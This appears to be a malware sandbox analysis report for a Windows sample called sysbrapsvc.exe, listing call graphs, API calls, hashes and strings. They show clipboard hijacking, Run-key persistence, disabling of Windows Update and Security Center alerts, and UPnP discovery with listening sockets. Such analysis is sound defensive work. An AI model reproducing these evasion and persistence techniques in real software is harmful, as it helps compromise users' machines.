40d10e 6079 40d140 send 6079->6077 6081 40d151 send 6080->6081 6082 40d0f3 6081->6082 6083 40d16e 6081->6083 6082->6077 6082->6079 6083->6081 6083->6082 6084 405fe5 6086 405f5e 6084->6086 6085 405fea LeaveCriticalSection 6086->6085 6087 40a6d0 8 API calls 6086->6087 6088 405fbc 6087->6088 6088->6085 6089 406ba6 6093 406b88 6089->6093 6090 406cc8 Sleep 6090->6093 6091 406bb9 6092 406260 4 API calls 6091->6092 6096 406bca 6092->6096 6093->6090 6093->6091 6094 406cd8 ExitThread 6093->6094 6097 406340 4 API calls 6093->6097 6095 406bf0 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 6099 406c66 wsprintfW 6095->6099 6100 406c7b wsprintfW 6095->6100 6096->6095 6098 406beb 6096->6098 6097->6093 6099->6100 6101 406650 51 API calls 6100->6101 6101->6098 6024 4069c8 6032 40696e 6024->6032 6025 40699e lstrcmpiW 6025->6032 6026 406b19 FindNextFileW 6027 406942 lstrcmpW 6026->6027 6028 406b35 FindClose 6026->6028 6031 406958 lstrcmpW 6027->6031 6027->6032 6034 406b42 6028->6034 6029 406a05 PathMatchSpecW 6030 406a26 wsprintfW SetFileAttributesW DeleteFileW 6029->6030 6029->6032 6030->6032 6031->6032 6032->6025 6032->6026 6032->6029 6033 406a83 PathFileExistsW 6032->6033 6037 406510 11 API calls 6032->6037 6033->6032 6035 406a99 wsprintfW wsprintfW 6033->6035 6035->6032 6036 406b03 MoveFileExW 6035->6036 6036->6026 6037->6032 6038 40f34c 6039 40f354 6038->6039 6041 40f408 6039->6041 6044 40f589 6039->6044 6043 40f38d 6043->6041 6048 40f474 RtlUnwind 6043->6048 6045 40f59e 6044->6045 6047 40f5ba 6044->6047 6046 40f629 NtQueryVirtualMemory 6045->6046 6045->6047 6046->6047 6047->6043 6049 40f48c 6048->6049 6049->6043 5856 405910 GetWindowLongW 5857 405934 5856->5857 5858 405956 5856->5858 5859 405941 5857->5859 5860 4059c7 IsClipboardFormatAvailable 5857->5860 5862 4059a6 5858->5862 5863 40598e SetWindowLongW 5858->5863 5874 405951 5858->5874 5866 405964 SetClipboardViewer SetWindowLongW 5859->5866 5867 405947 5859->5867 5864 4059e3 IsClipboardFormatAvailable 5860->5864 5865 4059da 5860->5865 5861 405b44 DefWindowProcA 5868 4059ac SendMessageA 5862->5868 5862->5874 5863->5874 5864->5865 5869 4059f8 IsClipboardFormatAvailable 5864->5869 5871 405a15 OpenClipboard 5865->5871 5872 405adf 5865->5872 5866->5861 5870 405afd RegisterRawInputDevices ChangeClipboardChain 5867->5870 5867->5874 5868->5874 5869->5865 5870->5861 5871->5872 5875 405a25 GetClipboardData 5871->5875 5873 405ae5 SendMessageA 5872->5873 5872->5874 5873->5874 5874->5861 5875->5874 5876 405a3d GlobalLock 5875->5876 5876->5874 5877 405a55 5876->5877 5878 405a68 5877->5878 5879 405a89 5877->5879 5880 405a9e 5878->5880 5881 405a6e 5878->5881 5882 405630 13 API calls 5879->5882 5898 405750 5880->5898 5883 405a74 GlobalUnlock CloseClipboard 5881->5883 5892 405510 5881->5892 5882->5883 5883->5872 5887 405ac7 5883->5887 5906 4048a0 lstrlenW 5887->5906 5890 40a660 _invalid_parameter 3 API calls 5891 405adc 5890->5891 5891->5872 5893 40551b 5892->5893 5894 405521 lstrlenW 5893->5894 5895 405534 5893->5895 5896 40a450 _invalid_parameter 7 API calls 5893->5896 5897 405551 lstrcpynW 5893->5897 5894->5893 5894->5895 5895->5883 5896->5893 5897->5893 5897->5895 5901 40575d 5898->5901 5899 405763 lstrlenA 5899->5901 5904 405776 5899->5904 5900 4055d0 2 API calls 5900->5901 5901->5899 5901->5900 5902 40a450 _invalid_parameter 7 API calls 5901->5902 5901->5904 5905 40a660 _invalid_parameter 3 API calls 5901->5905 5943 405700 5901->5943 5902->5901 5904->5883 5905->5901 5915 4048d4 5906->5915 5907 404d5e StrStrW 5908 404d71 5907->5908 5909 404d75 StrStrW 5907->5909 5908->5909 5910 404d88 5909->5910 5911 404d8c StrStrW 5909->5911 5910->5911 5912 404d9f 5911->5912 5913 404ae2 5912->5913 5914 404e09 isalpha 5912->5914 5927 404e43 5912->5927 5913->5890 5914->5912 5916 404e20 isdigit 5914->5916 5915->5913 5917 404c69 StrStrW 5915->5917 5920 404af4 5915->5920 5916->5912 5916->5913 5918 404c94 StrStrW 5917->5918 5917->5920 5919 404cbf StrStrW 5918->5919 5918->5920 5919->5920 5920->5907 5920->5913 5921 405351 StrStrW 5925 405364 5921->5925 5926 40536b StrStrW 5921->5926 5922 405303 StrStrW 5923 405316 5922->5923 5924 40531d StrStrW 5922->5924 5923->5924 5928 405330 5924->5928 5929 405337 StrStrW 5924->5929 5925->5926 5930 405385 StrStrW 5926->5930 5931 40537e 5926->5931 5927->5921 5927->5922 5928->5929 5929->5921 5932 40534a 5929->5932 5933 405398 5930->5933 5934 40539f StrStrW 5930->5934 5931->5930 5932->5921 5933->5934 5935 4053b2 5934->5935 5936 4053b9 StrStrW 5934->5936 5935->5936 5937 4053cc lstrlenA 5936->5937 5937->5913 5939 405492 GlobalAlloc 5937->5939 5939->5913 5940 4054ad GlobalLock 5939->5940 5940->5913 5941 4054c0 memcpy GlobalUnlock OpenClipboard 5940->5941 5941->5913 5942 4054ed EmptyClipboard SetClipboardData CloseClipboard 5941->5942 5942->5913 5944 40570b 5943->5944 5945 405711 lstrlenA 5944->5945 5946 4055d0 2 API calls 5944->5946 5947 405744 5944->5947 5945->5944 5946->5944 5947->5901 6050 40e5d1 6052 40e5da 6050->6052 6051 40e6cd 6052->6051 6053 40e643 lstrcmpiW 6052->6053 6054 40e6c3 SysFreeString 6053->6054 6055 40e656 6053->6055 6054->6051 6056 40e3c0 2 API calls 6055->6056 6058 40e664 6056->6058 6057 40e6b5 6057->6054 6058->6054 6058->6057 6059 40e693 lstrcmpiW 6058->6059 6060 40e6a5 6059->6060 6061 40e6ab SysFreeString 6059->6061 6060->6061 6061->6057 6116 4074f1 ExitThread 6062 40f354 6063 40f372 6062->6063 6064 40f408 6062->6064 6065 40f589 NtQueryVirtualMemory 6063->6065 6067 40f38d 6065->6067 6066 40f474 RtlUnwind 6066->6067 6067->6064 6067->6066 6129 407ff9 6130 408002 6129->6130 6131 408011 34 API calls 6130->6131 6132 408e46 6130->6132 6068 405f1d 6069 405eb1 6068->6069 6070 405f1b 6069->6070 6074 405f06 memcpy 6069->6074 6071 40a660 _invalid_parameter 3 API calls 6070->6071 6072 405f28 LeaveCriticalSection 6071->6072 6074->6070 6133 40a73e 6134 40a660 _invalid_parameter 3 API calls 6133->6134 6137 40a6fd 6134->6137 6135 40a712 6136 40a450 _invalid_parameter 7 API calls 6136->6137 6137->6135 6137->6136 6138 40a714 memcpy 6137->6138 6138->6137

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 291 402020-402032 call 40a240 294 402038-402070 GetSystemInfo InitializeCriticalSection CreateEventA 291->294 295 4021aa-4021ae 291->295 296 402076-402089 CreateIoCompletionPort 294->296 297 40219f-4021a8 call 401600 294->297 296->297 298 40208f-402099 call 40d5e0 296->298 297->295 298->297 303 40209f-4020b7 WSASocketA 298->303 303->297 304 4020bd-402120 setsockopt htons bind 303->304 304->297 305 402126-402138 listen 304->305 305->297 306 40213a-402145 WSACreateEvent 305->306 306->297 307 402147-402157 WSAEventSelect 306->307 307->297 308 402159-40215f 307->308 309 402161-402171 call 40d610 308->309 310 40217f-40218f call 40d610 308->310 313 402176-40217d 309->313 314 402194-40219e 310->314 313->309 313->310
                                                                                APIs
                                                                                • GetSystemInfo.KERNELBASE(?,?), ref: 00402043
                                                                                • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                                                                • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                                                  • Part of subcall function 0040D5E0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D5FE
                                                                                • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                                                                • setsockopt.WS2_32 ref: 004020D1
                                                                                • htons.WS2_32(?), ref: 00402101
                                                                                • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                                                                • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                                                                • WSACreateEvent.WS2_32 ref: 0040213A
                                                                                • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                                                  • Part of subcall function 0040D610: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D634
                                                                                  • Part of subcall function 0040D610: CreateThread.KERNELBASE(00000000,?,00000000,?,00000000,?), ref: 0040D68F
                                                                                  • Part of subcall function 0040D610: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D6CC
                                                                                  • Part of subcall function 0040D610: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D6D7
                                                                                  • Part of subcall function 0040D610: DuplicateHandle.KERNEL32(00000000), ref: 0040D6DE
                                                                                  • Part of subcall function 0040D610: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D6F2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                • String ID:
                                                                                • API String ID: 1603358586-0
                                                                                • Opcode ID: 4db169d13743859b8383a90071416f4958d16977be98986f5eea89773197346b
                                                                                • Instruction ID: 3d527d3106709ffe12c11fbc149f9fb6bead9182873b01420bf0fd5d4f043c35
                                                                                • Opcode Fuzzy Hash: 4db169d13743859b8383a90071416f4958d16977be98986f5eea89773197346b
                                                                                • Instruction Fuzzy Hash: C441B070640301BBD3209F649D0AF4B77E4AF44720F108A2DF6A9EA6D4E7F4E445C75A

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 332 40dbc0-40dbe7 socket 333 40dd21-40dd25 332->333 334 40dbed-40dcb5 htons inet_addr setsockopt call 40af30 bind lstrlenA sendto ioctlsocket 332->334 335 40dd27-40dd2d 333->335 336 40dd2f-40dd35 333->336 339 40dcbb-40dcc2 334->339 335->336 340 40dcc4-40dcd3 call 40dd40 339->340 341 40dd15-40dd19 call 40aff0 339->341 345 40dcd8-40dce0 340->345 344 40dd1e 341->344 344->333 346 40dce2 345->346 347 40dce4-40dd13 call 40a490 345->347 346->341 347->339
                                                                                APIs
                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 0040DBDA
                                                                                • htons.WS2_32(0000076C), ref: 0040DC10
                                                                                • inet_addr.WS2_32(239.255.255.250), ref: 0040DC1F
                                                                                • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040DC3D
                                                                                  • Part of subcall function 0040AF30: htons.WS2_32(00000050), ref: 0040AF5D
                                                                                  • Part of subcall function 0040AF30: socket.WS2_32(00000002,00000001,00000000), ref: 0040AF7D
                                                                                  • Part of subcall function 0040AF30: connect.WS2_32(000000FF,?,00000010), ref: 0040AF96
                                                                                  • Part of subcall function 0040AF30: getsockname.WS2_32(000000FF,?,00000010), ref: 0040AFC8
                                                                                • bind.WS2_32(000000FF,?,00000010), ref: 0040DC73
                                                                                • lstrlenA.KERNEL32(00411C48,00000000,?,00000010), ref: 0040DC8C
                                                                                • sendto.WS2_32(000000FF,00411C48,00000000), ref: 0040DC9B
                                                                                • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DCB5
                                                                                  • Part of subcall function 0040DD40: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DD8E
                                                                                  • Part of subcall function 0040DD40: Sleep.KERNELBASE(000003E8), ref: 0040DD9E
                                                                                  • Part of subcall function 0040DD40: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DDBB
                                                                                  • Part of subcall function 0040DD40: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DDD1
                                                                                  • Part of subcall function 0040DD40: StrChrA.SHLWAPI(?,0000000D), ref: 0040DDFE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                • String ID: 239.255.255.250
                                                                                • API String ID: 726339449-2186272203
                                                                                • Opcode ID: e3877ef1b52134d83e5684ab209baab9a63aea7bea6a3d9c299911e37c6d3f39
                                                                                • Instruction ID: ef7ed27ddc10e69a95ecf683d08ad8987f4418d9446925fcf09c3d01f5f265dc
                                                                                • Opcode Fuzzy Hash: e3877ef1b52134d83e5684ab209baab9a63aea7bea6a3d9c299911e37c6d3f39
                                                                                • Instruction Fuzzy Hash: 7141F8B4E10208ABDB14DFE4E889BEEBBB5EF48304F108169F505B7390E7B55A44CB59
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                                                                • htons.WS2_32(?), ref: 00401508
                                                                                • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                                                                • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                                                  • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401346
                                                                                  • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401352
                                                                                  • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 0040135C
                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00001100,00000000,00000000,00000000), ref: 00401569
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                • String ID:
                                                                                • API String ID: 4174406920-0
                                                                                • Opcode ID: 085a1a8f7e688ed9381a465e3f998c9afd0c9800f7049c23b91f22d3bd70f74c
                                                                                • Instruction ID: ddf1df2f5e3c49f21769c3cd8a86baa6c810c68bf5de7ecead628d1f617bc177
                                                                                • Opcode Fuzzy Hash: 085a1a8f7e688ed9381a465e3f998c9afd0c9800f7049c23b91f22d3bd70f74c
                                                                                • Instruction Fuzzy Hash: 72319571A44301AFE320DF649C4AF9BB6E0AF48B14F40493DF695EB2E0D3B5D544879A
                                                                                APIs
                                                                                • htons.WS2_32(00000050), ref: 0040AF5D
                                                                                  • Part of subcall function 0040AEF0: inet_addr.WS2_32(0040AF71), ref: 0040AEFA
                                                                                  • Part of subcall function 0040AEF0: gethostbyname.WS2_32(?), ref: 0040AF0D
                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 0040AF7D
                                                                                • connect.WS2_32(000000FF,?,00000010), ref: 0040AF96
                                                                                • getsockname.WS2_32(000000FF,?,00000010), ref: 0040AFC8
                                                                                Strings
                                                                                • www.update.microsoft.com, xrefs: 0040AF67
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                • String ID: www.update.microsoft.com
                                                                                • API String ID: 4063137541-1705189816
                                                                                • Opcode ID: 4ae1ef7093756838ff96254105526815b724e83601429590a4066d3349afa6d4
                                                                                • Instruction ID: 8d2b89a1e3841e6cd000a2b550c173cff20965c169263ef180e6ea1a6d777d84
                                                                                • Opcode Fuzzy Hash: 4ae1ef7093756838ff96254105526815b724e83601429590a4066d3349afa6d4
                                                                                • Instruction Fuzzy Hash: D1213BB0E103099BCB04DFE8D946AEEBBB5AF08300F108169E504F7390E7745A44CBAA
                                                                                APIs
                                                                                • CryptAcquireContextW.ADVAPI32(~@,00000000,00000000,00000001,F0000040,?,?,0040C389,~@,00000004,?,?,0040C3BE,000000FF), ref: 0040C343
                                                                                • CryptGenRandom.ADVAPI32(~@,?,00000000,?,?,0040C389,~@,00000004,?,?,0040C3BE,000000FF), ref: 0040C359
                                                                                • CryptReleaseContext.ADVAPI32(~@,00000000,?,?,0040C389,~@,00000004,?,?,0040C3BE,000000FF), ref: 0040C365
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                                • String ID: ~@
                                                                                • API String ID: 1815803762-592544116
                                                                                • Opcode ID: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
                                                                                • Instruction ID: 830194fa38359529e853ee3f0456384099f2f8dd9552bb81b1528bc6e0449336
                                                                                • Opcode Fuzzy Hash: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
                                                                                • Instruction Fuzzy Hash: B3E01275654208BBDB24CFE1EC49FDA776CAB48B00F108154FB09D7190DAB5EA409BA8
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DA0D,00000000), ref: 004013D5
                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                                • bind.WS2_32(?,?,00000010), ref: 00401429
                                                                                  • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401346
                                                                                  • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401352
                                                                                  • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 0040135C
                                                                                • CreateThread.KERNELBASE(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                • String ID:
                                                                                • API String ID: 3943618503-0
                                                                                • Opcode ID: 7920f1fa20b97f550be2e13ac393b81d85ae9c1e65d5af07afafdd8883ae4a63
                                                                                • Instruction ID: 1e7a4891c1a42a5318b19a32161f2d9e989c632f85172a1bcc985bb178a8dbbc
                                                                                • Opcode Fuzzy Hash: 7920f1fa20b97f550be2e13ac393b81d85ae9c1e65d5af07afafdd8883ae4a63
                                                                                • Instruction Fuzzy Hash: 18119674A40710AFE3609F749C0AF877AE0AF04B14F50892DF699E62E1E2B49544878A

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 407500-407534 Sleep CreateMutexA GetLastError 1 407536-407538 ExitProcess 0->1 2 40753e-4075dd GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW wcscmp 0->2 3 4075e3-4075ee call 40ebe0 2->3 4 4078a9-4078d4 Sleep RegOpenKeyExW 2->4 14 4075f0-4075f2 ExitProcess 3->14 15 4075f8-407646 ExpandEnvironmentStringsW wsprintfW CopyFileW 3->15 5 407902-407922 RegOpenKeyExW 4->5 6 4078d6-4078fc RegSetValueExA RegCloseKey 4->6 8 407924-407950 RegSetValueExA RegCloseKey 5->8 9 407955-407975 RegOpenKeyExW 5->9 6->5 11 4079fa-407a1a RegOpenKeyExW 8->11 12 407977-4079a6 RegCreateKeyExW RegCloseKey 9->12 13 4079ac-4079cc RegOpenKeyExW 9->13 17 407a1c-407a48 RegSetValueExA RegCloseKey 11->17 18 407a4d-407a6d RegOpenKeyExW 11->18 12->13 13->11 16 4079ce-4079f4 RegSetValueExA RegCloseKey 13->16 19 40764c-40767b SetFileAttributesW RegOpenKeyExW 15->19 20 4076de-407720 Sleep wsprintfW CopyFileW 15->20 16->11 23 407b49-407b69 RegOpenKeyExW 17->23 24 407aa4-407ac4 RegOpenKeyExW 18->24 25 407a6f-407a9e RegCreateKeyExW RegCloseKey 18->25 19->20 26 40767d-4076b0 wcslen RegSetValueExW 19->26 21 407726-407755 SetFileAttributesW RegOpenKeyExW 20->21 22 4077b8-407811 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 20->22 21->22 29 407757-40778a wcslen RegSetValueExW 21->29 22->4 30 407817-407846 SetFileAttributesW RegOpenKeyExW 22->30 27 407b97-407bb7 RegOpenKeyExW 23->27 28 407b6b-407b91 RegSetValueExA RegCloseKey 23->28 31 407ac6-407af5 RegCreateKeyExW RegCloseKey 24->31 32 407afb-407b1b RegOpenKeyExW 24->32 25->24 26->20 33 4076b2-4076d4 RegCloseKey call 40ee30 26->33 34 407be5-407c05 RegOpenKeyExA 27->34 35 407bb9-407bdf RegSetValueExA RegCloseKey 27->35 28->27 29->22 36 40778c-4077ae RegCloseKey call 40ee30 29->36 30->4 37 407848-40787b wcslen RegSetValueExW 30->37 31->32 32->23 38 407b1d-407b43 RegSetValueExA RegCloseKey 32->38 33->20 45 4076d6-4076d8 ExitProcess 33->45 40 407cf1-407d11 RegOpenKeyExA 34->40 41 407c0b-407ceb RegSetValueExA * 7 RegCloseKey 34->41 35->34 36->22 50 4077b0-4077b2 ExitProcess 36->50 37->4 43 40787d-40789f RegCloseKey call 40ee30 37->43 38->23 46 407d17-407df7 RegSetValueExA * 7 RegCloseKey 40->46 47 407dfd-407e12 Sleep call 40cc80 40->47 41->40 43->4 54 4078a1-4078a3 ExitProcess 43->54 46->47 55 407f87-407f90 47->55 56 407e18-407f70 WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 405b60 call 40daf0 call 406f70 CreateEventA call 40c3b0 call 40d5e0 call 40b770 call 40d610 * 4 call 40d780 47->56 80 407f75-407f84 call 40d8c0 56->80 80->55
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 0040750E
                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,b7x663937xa), ref: 0040751D
                                                                                • GetLastError.KERNEL32 ref: 00407529
                                                                                • ExitProcess.KERNEL32 ref: 00407538
                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\sysbrapsvc.exe,00000105), ref: 00407572
                                                                                • PathFindFileNameW.SHLWAPI(C:\Windows\sysbrapsvc.exe), ref: 0040757D
                                                                                • wsprintfW.USER32 ref: 0040759A
                                                                                • DeleteFileW.KERNELBASE(?), ref: 004075AA
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 004075C1
                                                                                • wcscmp.NTDLL ref: 004075D3
                                                                                • ExitProcess.KERNEL32 ref: 004075F2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                                                                • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$C:\Users\user\tbtcmds.dat$C:\Users\user\tbtnds.dat$C:\Windows\sysbrapsvc.exe$CheckedValue$DisableWindowsUpdateAccess$DisableWindowsUpdateAccess$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$NoAutoUpdate$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$WindowsUpdate$WindowsUpdate$b7x663937xa$sysbrapsvc.exe
                                                                                • API String ID: 4172876685-275362819
                                                                                • Opcode ID: aff6f25d3f8000eba581a1516f813dc5f7da4df36a577d5272a130dde58f2203
                                                                                • Instruction ID: 03a0cce086b07e6777eb00571f2894b6de511c4d2cf633d1374b0a1cea72e181
